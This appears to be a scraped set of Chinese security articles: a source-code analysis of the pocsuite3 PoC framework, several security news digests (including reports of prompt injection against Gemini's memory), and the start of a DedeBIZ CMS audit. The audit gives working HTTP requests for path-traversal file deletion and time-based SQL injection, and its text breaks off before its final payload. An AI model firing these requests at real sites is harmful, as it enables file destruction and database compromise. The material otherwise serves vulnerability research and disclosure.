pocsuite3 是由 知道创宇 404实验室 开发维护的开源远程漏洞测试和概念验证开发框架。为了更好理解其运行逻辑，本文将从源码角度分析该项目的初始化，多线程函数，poc模板等等源码。 项目结构 api：对要导入的包重命名，方便后续导入调用data：存储用户需要使用的文档数据lib：项目核心代码modules：存储用户自定义的模块plugins：存储用户自定义的插件pocs：存储poc文件shellcodes：存储生成php，java，python等脚本语言的利用代码，以及反弹shell的利用代码cli.py：项目的入口console.py：命令行界面 进入项目入口：/pocsuite3/cli.py check_environment() #检查当前工作目录是否符合当前系统set_paths(). #设置后续需要用到的数据，目录信息banner() #打印命令行页面的横幅 init_options(cmd_line_parser().dict) # 命令行参数处理跟进cmd_line_parser()查看： 此处注意一个参数-c target.add_argument("-c", dest="configFile", help="Load options from a configuration INI file") 可以先在pocsuite.ini配置好参数，通过pocsuite -c pocsuite.ini 运行 双重跟进init_options()，找到命令行存储参数： 可见采用了类似字典的形式存储，避免了重复数据且还有其它四个参数也采用了该形式存储，五个参数贯穿整个项目 conf：存储基本配置信息kb：存储了目标地址、加载的PoC、运行模式、输出结果、加载的PoC文件地址、多线程信息等cmd_line_options：是存储命令行输入的参数值merged_options：存储输入值与默认值合并后的结果paths：存储数据、插件、poc等目录地址 参数获取处理完后，进入项目初始化，init()函数，一下对部分函数进行注解分析： def init(): """ Set attributes into both configuration and knowledge base singletons based upon command line and configuration file options. """ set_verbosity() #日志输出级别设置 _adjust_logging_formatter() #调整日志格式器 _cleanup_options() #将各个配置项格式化，并校验合法性 _basic_option_validation() #校验seebug,zoomeye等api,token的合法性 _create_directory() #检测文件路径是否存在，不存在则创建 _init_kb_comparison() update() _set_multiple_targets() #读取目标 _set_user_pocs_path() _set_pocs_modules() #动态加载poc _set_plugins() #动态加载插件 _init_targets_plugins() _init_pocs_plugins() _set_task_queue() #初始化多线程设置 _init_results_plugins() #初始化输出插件 AttribDict类解析 前文也提到过以下五个全局变量，它们均通过创建AttribDict类的实例进行使用，现在我们跟进类详细分析： AttribDict()类： 自定义类，继承自python内建的OrderedDict类，扩展访问方式，简化了对字典键的访问。主要存在三个方法：getattr(),setattr(),delattr()这三个方法在if判断逻辑均相同：1:以双下划线 __ 开头（例如，Python 的内置属性，如 dict）。2:以 _OrderedDict__ 开头（因为 OrderedDict在内部实现中使用的名称）。3:名字存在于 exclude_keys 集合中（排除的键）。如果任一条件成立，说明这个属性不应该通过 obj.attr访问，所以跳过使用自定义的 getattr处理，直接调用父类对应的方法访问。例：getattr()就调 如果属性名不满足，则通过字典的方式，添加或者删除AttribDict中 地址处理代码分析 先查看存储初始数据，存在则进行下一步。通过set()创建集合方便去重，再遍历conf.url数据，通过parde_target()进行对url进行分析处理，并且在不为空的情况下调用集合的add()方法添加，完成后再将，用于临时存储的target集合里面的数据，放到kb这种全局变量内。parde_target()函数 接受参数后先if判断，如果是域名，url，ip:端口形式则直接赋值给target跟进其中一个判断函数： 跟进： 可见是通过正则进行判断。接着再判断如果为http://ipv6形式，则启动ipv6配置，并进行赋值target，依旧是正则判断。 再判断如果为ipv4则调用python内置ip_address解析赋值，该方法自动区分ipv4或者ipv6并最后返回对应的对象。再通过else判断，对纯ipv6地址，或者ipv6网络进行解析赋值。 动态poc加载 Step1：从pocs目录加载先通过os.listdir读取对应目录，返回一个含有poc的py文件的列表。再通过filter()函数过滤init.之类文件，不过此时filter()函数返回的是一个迭代器，所以又通过list()函数将数据处理成列表再赋值。（lambda x: x not in ['init.py','init.pyc']：这个匿名函数会检查每个文件名 x 是否不等于'init.py' 或 'init.pyc'。） 再从含有类似thinkphp_poc.py的文件名中，通过x变量循环读取，并通过splitex()函数将其分为"thinkphp_poc",".py"格式的键值队元组。再次通过dict()字典函数，将x元组的第一个元素作为字典的键，第二个元素作为字典的值。 如果poc是目录，则使用 os.walk() 递归遍历该目录下的所有文件，过滤出 .py或 .yaml 文件，并将其完整路径添加到 _pocs 列表中。 Step2：遍历加载 PoC 文件内容并检查，并对加载失败的poc进行日志记录。 Step3：最后从 Seebug 网站加载 PoC。 poc模版跟据目录找到现存poc：pocsuite3/pocs，thinkphp_rce为例 所有模版均是继承自父类POCBase，跟进： 父类在初始化时便设置了一系列可能用到的属性，例如自定义headers，目标url，端口等等。这里关注execute()函数 self.url处采用if判断：如果为http协议则采用parse_target_url()解析，else采用build_url()解析：mode值默认为verify。随后调用_execute()根据mode值执行。 shell()，attack()，_verify()均需自定义重写。回到例thinkphp_rce例子：_verify()函数如下： 调用了_check()函数进行检验： 通过request.post()发送设置好payload的请求，根据返回包关键字判断是否成功。（flag自定义）返回的结果在_verify()函数又会调用parse_output()转化为json格式输出。 动态核心load_file_to_module()继续分析_set_pocs_modules() 将读取文件切割为文件名和后缀名，根据后缀名重构路径file_pth，if判断file_path构建成功则进入红框代码处。 通过get_filename()从file_path路径提取文件名，由于wuth.ext=False，则不提取文件名后缀，提取后拼接在pocs_后并赋值给module，例如：pocs_thinkphp_rce。随后三行代码涉及到python中动态模块加载知识： spec = importlib.util.spec_from_file_location(module_name, file_path, loader=PocLoader(module_name, file_path)) #创建模块规格，采用自定义加载器类加载模块，loader:加载器对象，负责如何从文件加载模块 mod = importlib.util.module_from_spec(spec)#根据规格创建模块对象 spec.loader.exec_module(mod) #执行模块代码，确保为完整可用的模块 动态模块注解： 模块是包含 Python 代码的文件，可以通过 import语句加载并使用。通常，当你使用 import 语句导入一个模块时，Python会根据模块的名称查找相应的文件（如 .py 文件），并将其加载到内存中。 然而，在一些特殊的情况下，比如动态加载模块或运行时创建模块，我们需要用到importlib 模块。importlib提供了一些工具，可以帮助我们在运行时加载模块，而不是在编写代码时静态地导入。 例如：importlib.util.spec_from_file_location spec（模块加载规格）描述了如何加载一个模块。它定义了如何找到模块代码，如何加载它，以及加载时需要的一些元数据。类似于说明书，它告诉Python 模块在哪里、叫什么名字、以及如何加载它。 接着看看是如何调用loader加载器的exec_module()函数进行加载的： filename接受poc绝对路径，poc_code接受poc文件内容。随后调用check_requires()检查代码运行中需要的包，通过import函数导入。compile()为python内置函数，将源代码字符串poc_code编译为字节码，'exec'这是一个编译模式，表示代码将作为一段可执行的代码被执行。常见的编译模式有'eval'（用于单个表达式）和 'exec'（用于整个代码块）之后再调用exec()函数执行字节码对象obj当中的代码，并绑定到module.dict上，这样就可以通过module.函数()直接调用poc_code当中的函数。 多线程与输出加载 跟进：_set_task_queue() if判断，poc模版与目标ip均不为空情况下，遍历出poc_module与target。并将它们组成元组，加入kb.task_queue中，确保数据在线程安全传输。 start()函数 调用runtime_check()检查poc是否加载成功： 再调用python标准库中的queue.Queue类的qsize()方法，获取先前kb.task_queue队列的任务数量。run_threads()函数随后进入start()函数核心：run_threads(conf.threads, task_run)：该函数传入线程数conf.threads()，与多线程执行函数task_run()。 这个函数的目的是启动多个线程并执行给定的函数thread_function。num_threads: 需要启动的线程数量。thread_function: 要在线程中运行的目标函数。args: 传递给 thread_function 的参数，默认为空元组。forward_exception: 控制是否在捕获异常后继续传播异常，默认值为 True。start_msg: 控制是否输出启动线程的消息，默认值为 True。 先threads = []创建空列表，用来存储后续的线程实例 随后进行线程数检查，如果大于1，则是多线程，并在线程数超过max时发出告警提示，线程不大于1，则直接执行函数 检查完为多线程则进行下一步：循环创建线程，并启动 根据num_threads数量循环创建，并调用setDaemon(TRUE)将所有线程设置为守护线程。（守护线程：后台运行，随主线程终止而终止) 随后再调用python标准库函数isAlive()进行循环检查，直到所有线程完成才跳出循环。(python3建议使用is_Alive()函数)。 执行完run_threads()函数后，finally代码再执行task_done()，跟进该函数，内部存在三个函数： show_task_result()：会取出poc执行结果，然后格式化输出 result_plugins_start():该函数负责调用file_record.py中的start()函数 result_compare_handle():显示来自各个搜索引擎的对比数据 先前已经分析了start(0函数核心在于run_threads(conf.threads,task_run)，我们接着跟进分析多线程执行函数：task_run() 多线程执行函数： task_run(): 先确认task_queue不为空，并且thread_continue为真，随后从task_queue获取目标ip与poc模版 （之前通过task_queue.put((target,poc_module))存储进去的） 随后调用python标准库copy模块中的deepcpy，进行深拷贝操作，复制poc模版，防止原始poc模块被修改。 poc_name获取poc模块名称方便日志打印。 随后处理用户自定义参数，检查是否尝试修改白名单内容，并校验是否存在必选参数未设置。 随后进入核心代码块，根据传参调用excute()函数： 后续则是根据测试成功或者失败，对结果进行处理输出 综合文章分析，pocsuite3项目被我分成如下执行流程： 在clip.py中调用main()函数，整个项目则开始执行，进行环境检查，参数获取后，则进入核心代码：在main()函数中调用init()与start()函数，最后则是我上文刚分析过的数据处理与输出格式化。

1、黑客利用修改版SharpHide工具创建隐藏注册表 https://medium.com/@andrew.petrus/exposing-hidden-malware-persistence-created-by-sharphide-4d3c784319f0 网络安全研究发现，黑客通过修改后的SharpHide工具开发了一种隐蔽的恶意软件持久性技术。此技术利用Windows注册表重定向功能，通过在注册表路径前添加空字符，创建隐藏的Run键值。此外，在64位系统中，恶意软件通过WOW6432Node注册表重定向路径增加隐蔽性，常见工具如Autoruns无法检测。为应对此威胁，研究员开发了SharpDelete工具，专门用于检测并删除这些隐藏的注 2、新型恶意软件Btmob RAT通过钓鱼网站传播 https://thecyberexpress.com/btmob-rat/ Btmob RAT是一种新发现的高级Android恶意软件，由早期的SpySolr演变而来，具有远程控制、凭据窃取和数据泄露等多种恶意功能。该恶意软件通过伪装成流行流媒体平台（如iNat TV）和虚假加密货币挖矿网站的钓鱼网站传播。一旦安装，Btmob RAT会利用Android的辅助功能服务，通过WebSocket与命令与控制（C2）服务器通信，实时执行命令并窃取敏感数据。 3、恶意软件FinalDraft滥用Outlook进行秘密通信 https://www.elastic.co/security-labs/finaldraft 研究人员在调查REF7707时发现针对外交部的新型恶意软件家族“FINALDRAFT”，该恶意软件主要针对南美某国的外交部，利用Microsoft Graph API通过Outlook邮件草稿进行秘密通信。FinalDraft支持37种命令，包括数据窃取、进程注入、网络代理和文件操作等。其通信方式隐蔽，通过Outlook草稿发送和接收命令，避免检测。研究人员建议通过监控Microsoft Graph API的使用情况和部署高级端点安全解决方案来防御此类威胁。 4、谷歌双重漏洞致YouTube用户Gmail地址泄露 https://www.theregister.com/2025/02/17/infosec_news_in_brief/ 安全研究人员发现谷歌存在两个漏洞，通过这些漏洞，攻击者可以利用YouTube用户ID获取其Gmail地址。研究人员通过分析Google的People API和Pixel Recorder应用，发现了一个可以将Gaia ID解析为电子邮件地址的漏洞。通过技术手段，研究人员成功绕过了通知机制，从而在不触发警报的情况下暴露目标用户的电子邮件地址。谷歌随后修复了相关缺陷，并向研究人员支付了总计10633美元的赏金。 5、勒索软件XELERA伪装招聘信息攻击印度求职者 https://www.seqrite.com/blog/xelera-ransomware-fake-fci-job-offers/ 安全团队近期发现一种名为XELERA的勒索软件通过伪装成印度食品公司（FCI）的虚假招聘信息，针对求职者发起攻击。攻击者利用恶意Word文档作为诱饵，文档中嵌入恶意代码，通过多阶段感染链部署勒索软件。该软件不仅加密受害者文件，还利用Discord机器人窃取数据、干扰系统，并最终显示勒索信息。目前，该攻击正在积极传播，对求职者构成严重威胁。 6、SonicWall防火墙认证绕过漏洞正遭大规模利用 https://www.freebuf.com/vuls/421945.html 网络安全公司警告称，SonicWall防火墙中存在的一个严重认证绕过漏洞正在被积极利用，该漏洞编号为CVE-2024-53704 。2025年2月10日，随着Bishop Fox的研究人员公开发布了概念验证（PoC）漏洞利用代码，未修补设备组织面临的风险大大增加。 7、《个人信息保护合规审计管理办法》5月起施行 https://www.thepaper.cn/newsDetail_forward_30158314 近日，国家互联网信息办公室公布《个人信息保护合规审计管理办法》，自2025年5月1日起施行。《办法》对合规审计活动的开展、合规审计机构的选择、合规审计的频次、个人信息处理者和专业机构在合规审计中的义务等作出细化规定，旨在为个人信息处理者开展个人信息保护合规审计提供系统性、针对性、可操作性的规范，提升个人信息处理活动合法合规水平，保护个人信息权益。 8、"杀猪盘"诈骗猖獗：2024年成加密货币诈骗新高 https://www.helpnetsecurity.com/2025/02/14/pig-butchering-scams-fraud-growth/ 据Chainalysis最新报告，2024年成为诈骗分子的“丰收年”，他们通过非法活动至少攫取了99亿美元加密货币收入。随着持续分析揭示更多欺诈行为，这一数字有望飙升至24亿的历史新高。 9、苹果macOS内核现防护漏洞，3秒就可能被攻破 https://cybersecuritynews.com/kaslr-exploited-apple-silicon/ 韩国大学的安全研究人员发现了一个新漏洞“SysBumps” ，针对搭载 Apple Silicon 处理器的 macOS 系统，能够绕过内核地址空间布局随机化（KASLR）机制。 10、新型设备码钓鱼攻击：利用设备认证窃取身份令牌 https://cybersecuritynews.com/new-device-code-phishing-attack-exploit-device-code-authentication/ 微软威胁情报团队发现，一种名为“设备码钓鱼”的复杂网络钓鱼活动，正被用于窃取用户身份认证令牌。这种攻击手段被一个名为 Storm-2372 的黑客组织所使用，自2024年8月以来，该组织一直活跃，目标是全球多个行业和政府机构。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员披露whoAMI云镜像名称混淆攻击 https://securitylabs.datadoghq.com/articles/whoami-a-cloud-image-name-confusion-attack/ 研究人员披露了一种名为“whoAMI”的云镜像名称混淆攻击，该攻击利用AWS用户在检索AMI时的配置错误，可能导致恶意代码在目标账户中执行。攻击者通过发布与官方AMI名称类似的恶意AMI，并利用用户在检索时未指定AMI所有者的漏洞，诱使目标系统使用恶意镜像。AWS已通过推出“允许的AMI”功能来应对此类攻击，同时研究人员开发了whoAMI-scanner工具，帮助用户检测环境中是否存在未经授权的AMI使用情况。 2、黑客滥用Webflow CAPTCHA技术开展新型网络钓鱼 https://www.netskope.com/blog/new-phishing-campaign-abuses-webflow-seo-and-fake-captchas 研究人员正在追踪一起大规模网络钓鱼活动，攻击者通过滥用Webflow CDN托管的恶意PDF文件，利用搜索引擎优化（SEO）技术将受害者引导至嵌有伪造CAPTCHA图像的钓鱼页面，诱骗受害者输入个人信息和信用卡详情。受害者主要分布于北美、亚洲和南欧地区，目标行业包括科技、制造和银行业。攻击者的策略使钓鱼页面能规避静态扫描检测，最终窃取受害者的财务和个人信息。 3、黑客泄露1200万Zacks Investment用户账户数据 https://www.bleepingcomputer.com/news/security/hacker-leaks-account-data-of-12-million-zacks-investment-users/ 近日，黑客在论坛声称已于2024年6月成功入侵Zacks Investment Research（Zacks），泄露了约1200万用户的数据。泄露信息包括用户的全名、电子邮件地址、用户名、实际地址、电话号码及SHA-256哈希形式的密码等。黑客通过域管理员权限访问Zacks的活动目录，并窃取主网站及16个相关站点的源代码。Zacks尚未就此次事件发布声明。如被确认，这将是四 4、荷兰警方查获127台XHost服务器 https://www.bleepingcomputer.com/news/legal/dutch-police-seizes-127-xhost-servers-dismantles-bulletproof-hoster/ 荷兰警方于近日查获127台服务器，成功摧毁了防弹托管服务商ZServers/XHost的运营网络。该托管商被指控为网络犯罪提供支持，包括协助LockBit勒索软件攻击、分发恶意软件以及支持洗钱等活动。此次行动是国际合作的一部分，美国、澳大利亚和英国当局此前已对该防弹托管商实施制裁。 5、CL0P勒索组织利用Cleo漏洞扩大攻击范围 https://www.cyfirma.com/research/cl0p-ransomware-latest-attacks/ 近日安全人员发现Cl0p勒索组织通过利用Cleo漏洞（CVE-2024-50623）扩大其攻击范围，已公布43个受害组织的名单，涉及制造业、零售业和运输业，该漏洞允许攻击者执行远程代码并窃取敏感数据。CL0P与俄罗斯网络犯罪集团TA505关系密切，显示其具备长时间隐匿及高效攻击能力。安全人员建议企业升级安全补丁、优化网络钓鱼防御，并通过YARA规则和IoC监控增强威胁检测能力，以遏制此类攻击风险。 6、Palo Alto 修复PAN-OS身份验证绕过漏洞 https://securityadvisories.paloaltonetworks.com/CVE-2025-0108 Palo Alto Networks修复了其PAN-OS软件中的一个高危身份验证绕过漏洞（CVE-2025-0108），该漏洞CVSS评分为7.8。攻击者可利用此漏洞绕过身份验证，访问管理Web界面并调用某些PHP脚本，从而获取敏感数据。受影响版本包括PAN-OS 10.1至11.2的多个版本，官方已发布更新修复该漏洞。 7、黑客利用智能合约漏洞盗取价值950万美元以太币 https://www.bleepingcomputer.com/news/cryptocurrency/zklend-loses-95m-in-crypto-heist-asks-hacker-to-return-90-percent/ 去中心化放贷平台zkLend近日遭遇智能合约攻击，黑客利用其智能合约中mint()函数的舍入误差漏洞，窃取了约3600个以太币（价值约950万美元）。zkLend迅速发出警告，向黑客提议归还被盗资金的90%（3,300 ETH），允许其保留10%作为白帽赏金，且免除相关责任。如果黑客未归还资金，zkLend将采取进一步法律行动。 8、Lazarus组织利用Marstech1植入程序发起供应链攻击 https://thehackernews.com/2025/02/lazarus-group-deploys-marstech1.html 朝鲜黑客组织Lazarus Group近期通过名为“Marstech1”的JavaScript植入程序，针对开发人员发起了供应链攻击。该恶意程序通过托管在GitHub的开源存储库传播，最早在2024年12月被发现，目标包括MetaMask等加密货币钱包。攻击范围涵盖美国、欧洲和亚洲，共造成至少233名受害者。 9、WinZip披露可致远程代码执行高危漏洞 https://securityonline.info/cve-2025-1240-winzip-vulnerability-opens-door-to-remote-code-execution/ WinZip近日披露一个严重的远程代码执行漏洞（CVE-2025-1240）。该漏洞存在于WinZip解析7Z文件的过程中，由于对用户提供的数据验证不足，可能导致内存中的越界写入。该漏洞的CVSS评分为7.8，影响WinZip 28.0及更早版本。WinZip修复了该漏洞，并建议用户立即升级至最新版本以规避风险。 10、Doxbin平台遭黑客组织Tooda攻击致数据泄露 https://hackread.com/doxbin-data-breach-hackers-leak-user-records-blacklist-file/ Doxbin平台因遭到黑客组织Tooda的攻击而发生数据泄露事件。Tooda在其官方网站和Telegram频道上声称，他们破坏了Doxbin的基础设施，删除了用户账户，锁定了管理员，并泄露了包含136814名用户ID、用户名和电子邮件地址的数据库。此外，攻击者还曝光了一个名为“Doxbin黑名单”的文件，其中记录了那些曾付费阻止其信息出现在Doxbin上的人员。Tooda还公布了Doxbin管理员的个人信息，并指控其滥用职权，引发 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Sandworm分支组织对全球15个国家发起BadPilot攻击活动 https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/ 安全团队披露俄罗斯支持的黑客组织Sandworm的分支Seashell Blizzard（APT44）在全球15个国家发起“BadPilot”攻击行动，目标涵盖能源、航运和政府机构等关键领域。该行动利用多个已知漏洞，旨在获取初始访问权限并维持长期持久性。攻击手段涵盖合法远程软件部署、自定义Web 2、APT组织Kimsuky利用PowerShell实施新型网络攻击 https://x.com/MsftSecIntel/status/1889407814604296490 与朝鲜关联黑客组织Kimsuky近期采用新策略，通过鱼叉式网络钓鱼攻击诱骗目标以管理员身份运行PowerShell并执行恶意代码。这种攻击手法伪装成韩国政府官员发送的邮件，邮件附带PDF文档和链接，指导用户完成Windows注册步骤。一旦目标运行代码，恶意程序会下载基于浏览器的远程桌面工具和加密证书，随后通过远程服务器注册设备，允许攻击者远程访问并窃取数据。 3、研究人员揭示NVIDIA容器逃逸漏洞新细节 https://www.wiz.io/blog/nvidia-ai-vulnerability-deep-dive-cve-2024-0132 研究人员近日对NVIDIA容器工具包的关键漏洞CVE-2024-0132进行了技术分析，揭示了其可导致容器逃逸和主机入侵的操作方式。该漏洞源于容器初始化阶段的文件挂载机制，攻击者可操纵符号链接和目录结构将主机的根文件系统挂载到容器内，并通过访问主机的Docker套接字提升权限，生成特权容器。虽然该漏洞主要影响Docker环境，但Google gVisor等增强隔离技术同样未能幸免。 4、利用ThinkPHP和ownCloud漏洞攻击活动显著增加 https://www.greynoise.io/blog/new-exploitation-surge-attackers-target-thinkphp-and-owncloud-flaws-at-scale 研究人员发现针对ThinkPHP和ownCloud漏洞的攻击活动显著增加。CVE-2022-47945是ThinkPHP中的本地文件包含（LFI）漏洞，尽管其EPSS评分较低（7%）且未被CISA列入已知漏洞目录（KEV），但攻击频率大幅上升，过去10日内有572个独立IP尝试利用。CVE-2023-49103是一个影响ownCloud GraphAPI的信息泄露漏洞，已被CISA 5、OpenSSL修复CVE-2024-12797高危漏洞 https://openssl-library.org/news/secadv/20250211.txt OpenSSL项目近日发布安全更新，修复了编号为CVE-2024-12797的漏洞。此漏洞允许攻击者通过中间人攻击（MitM）窃取通信数据。问题出在客户端使用原始公钥（RPK）功能时未能正确验证服务器身份，从而导致安全隐患。尽管RPK功能默认未启用，但受影响的版本包括OpenSSL 3.4、3.3和3.2。项目维护团队建议所有使用这些版本的用户立即升级至最新版本3.4.1、3.3.2和3.2.4，以避免潜在风险。 6、大规模物联网数据泄露事件曝光27亿条记录，包含Wi-Fi密码 https://www.freebuf.com/articles/network/421707.html 近日，一场规模巨大的物联网（IoT）安全漏洞事件曝光了27亿条包含敏感用户数据的信息，其中包括Wi-Fi网络名称、密码、IP地址和设备标识符。此次事件与中国植物生长灯制造商Mars Hydro以及加州注册公司LG-LED SOLUTIONS LIMITED有关。 7、黑客利用提示词注入严重篡改Gemini AI长期记忆 https://www.freebuf.com/news/421630.html 近日，一场针对谷歌 Gemini Advanced 聊天机器人的复杂攻击被曝光。该攻击利用间接提示词注入和延迟工具调用这两种手段，成功破坏了 AI 的长期记忆，使攻击者能够在用户会话间植入虚假信息。 8、Windows存储系统0day漏洞，攻击者可远程删除目标文件 https://www.freebuf.com/articles/system/421642.html Windows系统近日被曝出一个重大安全漏洞，攻击者可利用该漏洞远程删除受影响系统上的目标文件。该漏洞编号为CVE-2025-21391，于2025年2月11日披露，属于权限提升漏洞，严重性被评定为"重要"级别。CVE-2025-21391利用了一个被称为"文件访问前链接解析不当"（CWE-59）的缺陷，使攻击者能够操纵文件访问权限。该漏洞的CVSS评分为7.1，属于中高风险的漏洞。 9、OmniGPT疑似遭入侵：黑客泄露3400万条用户数据 https://hackread.com/omnigpt-ai-chatbot-breach-hacker-leak-user-data-messages/ 聊天机器人平台 OmniGPT 疑似遭黑客入侵，3万名用户的电子邮件、电话号码以及超过3400 万条用户对话被泄露。若得到证实，这将成为 AI 生成对话数据中规模最大的泄露事件之一。 10、警惕针对DeepSeek的开源软件供应链攻击 https://www.secrss.com/articles/75552 自从2024年12月26日deepseek V3发布之后，开源生态中出现了大量与其相关的软件包，大多数为工具类软件包。但天问监测模块发现了其中潜藏的部分恶意攻击包，通过包名伪造来诱导用户下载，窃取用户隐私信息。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Sandworm使用伪装KMS激活工具攻击乌克兰 俄罗斯军事黑客组织Sandworm（APT44）被发现利用伪装成微软KMS激活工具的恶意软件攻击乌克兰Windows用户。攻击自2023年底开始，通过木马化的KMS工具传递BACKORDER加载程序，最终部署DarkCrystal RAT (DcRAT)。DcRAT可窃取系统凭据、键盘记录、浏览器数据及屏幕截图等敏感信息。乌克兰因盗版软件广泛使用而成为攻击目标，政府机构也深受其害。 https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns 2、研究人员披露GitHub SAML漏洞 https://repzret.blogspot.com/2025/02/abusing-libxml2-quirks-to-bypass-saml.html 安全研究员曝光了影响GitHub Enterprise SAML身份验证漏洞（CVE-2025-23369），该漏洞允许攻击者通过伪造SAML响应绕过身份验证，冒充任意账户访问系统。利用此漏洞，攻击者可能获得对私有代码库的访问权限或在组织环境中提升权限。GitHub已发布修复补丁，建议企业用户立即更新系统以防范潜在攻击。 3、1.2万个 KerioControl 防火墙实例易受一键式 RCE 攻击 https://cybersecuritynews.com/keriocontrol-firewall-1-click-rce/ 研究人员已在 GFI KerioControl 防火墙中发现了一个严重安全漏洞 CVE-2024-52875，该漏洞影响版本 9.2.5 至 9.4.5。 4、Progress发布安全更新修复多个漏洞 https://thehackernews.com/2025/02/progress-software-patches-high-severity.html Progress Software修复了其LoadMaster软件中的多个高严重性漏洞，这些漏洞可能被攻击者利用执行任意系统命令或下载系统文件。漏洞编号包括CVE-2024-56131至CVE-2024-56135，CVSS评分高达8.4。虽然目前无证据表明这些漏洞已被利用，但鉴于以往漏洞曾被威胁者攻击，Progress强烈建议用户尽快更新至最新版本以避免风险。 5、OpenSSL 软件库曝高危漏洞，可实施中间人攻击 https://www.freebuf.com/news/421516.html OpenSSL 项目在其安全通信库中修复了一个高严重性漏洞，编号为 CVE-2024-12797。OpenSSL 软件库用于在计算机网络中实现安全通信，防止窃听并确保通信双方的认证。该库包含了安全套接层（SSL）和传输层安全（TLS）协议的开源实现。 6、攻击者利用新零日漏洞劫持Fortinet防火墙 https://www.freebuf.com/vuls/421518.html Fortinet近日发布警告，称威胁攻击者正在利用FortiOS和FortiProxy中的一个新零日漏洞（CVE-2025-24472，CVSS评分为8.1）来劫持Fortinet防火墙。该漏洞是一个身份验证绕过问题，远程攻击者可以通过构造恶意CSF代理请求获取超级管理员权限。 7、Gcore DDoS报告揭示：DDoS攻击量同比增长56% https://www.freebuf.com/articles/network/421494.html Gcore最新的DDoS雷达报告，对2024年第三季度至第四季度的DDoS攻击数据进行了深入分析。报告显示，这一时间段内，DDoS攻击总量呈现出迅猛增长的态势，同比增长56%，其中最大攻击峰值更是飙升至前所未有的2Tbps，创下历史纪录。 8、复旦大学研究：AI 跨越关键“红线”，已能实现自我复制 https://www.ithome.com/0/829/942.htm 2024 年 12 月 9 日，复旦大学的研究人员在预印本数据库 arXiv 上发表了一项研究，指出两种流行的大型语言模型（LLMs）能够在无人类干预的情况下克隆自身。 9、 黑产团伙专门窃取DeepSeek API密钥，已有多个泄露 https://www.darkreading.com/application-security/llm-hijackers-deepseek-api-keys 安全研究团队发现，有黑产团伙开始专门窃取云上部署DeepSeek大模型的API密钥，对外以30美元/月售卖使用权限。 10、Ubuntu 打印漏洞可在锁定的笔记本电脑上执行任意代码 https://cybersecuritynews.com/ubuntu-printing-vulnerability/ 最近在 Ubuntu 22.04 的打印子系统中发现的一个漏洞，特别是在“ippusbxd”包中，可能允许攻击者在锁定的笔记本电脑上执行任意代码。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

之前简单审计过DedeBIZ系统，网上还没有对这个系统的漏洞有过详尽的分析，于是重新审计并总结文章，记录下自己审计的过程。 https://github.com/DedeBIZ/DedeV6/archive/refs/tags/6.2.10.zip📌DedeBIZ 系统并非基于 MVC 框架，而是采用 静态化与动态解析结合 的方式进行页面处理。其“路由”主要依赖 静态文件跳转 和 数据库模板解析，因此可以直接访问 PHP 文件来触发相应的动态解析逻辑。 我一般会首先关注对文件的操作，任意文件上传、任意文件删除，任意文件读取、任意文件下载等漏洞都是我第一时间关注的重点，除了黑盒测试时关注功能点外，通过代码审计来看的话速度会更快一点。（这里有一个小技巧，就是直接全局搜索?filename= ，一些 js 文件中可能会包含对文件处理的操作，搜索到后就可以直接进行尝试。） 授权任意文件删除 GET /admin/file_manage_control.php?fmdo=del&filename=../1.txt HTTP/1.1 Host: dedev6.test Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=51t797sesf49d9oo8je5ugvjfa; dede_csrf_token=dfb0e80d4f74949ef3730a90d3f49c64; dede_csrf_token__ckMd5=554688926d285f96; DedeUserID=1; DedeUserID__ckMd5=6269166a7279678f; DedeLoginTime=1703426661; DedeLoginTime__ckMd5=7c3591094ad5f36b; DedeStUUID=22636dd1d7205; DedeStUUID__ckMd5=bae1 Connection: close src\admin\file_manage_control.php src\admin\file_class.php#DeleteFile 该漏洞发生在 file_manage_control.php 处理 fmdo=del请求时，由于 DeleteFile方法直接拼接 filename参数生成完整路径并调用 unlink 删除文件，缺乏路径校验，导致攻击者可以构造 ../进行目录遍历，删除任意文件。通过 GET /admin/file_manage_control.php?fmdo=del&filename=../1.txt请求，利用 filename=../1.txt逃出受限目录，删除站点根目录下的 1.txt文件。 授权 SQL 注入 首先需要创建表单 修改添加字段信息 点击字段发布信息 构造数据包 POST /admin/diy_list.php?action=delete&diyid=1&id[]=1)AND+sleep(5 HTTP/1.1 Host: dedev6.test Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://dedev6.test/admin/index_body.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=51t797sesf49d9oo8je5ugvjfa; dede_csrf_token=dfb0e80d4f74949ef3730a90d3f49c64; dede_csrf_token__ckMd5=554688926d285f96; DedeUserID=1; DedeUserID__ckMd5=6269166a7279678f; DedeLoginTime=1703426661; DedeLoginTime__ckMd5=7c3591094ad5f36b Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 构造 payload 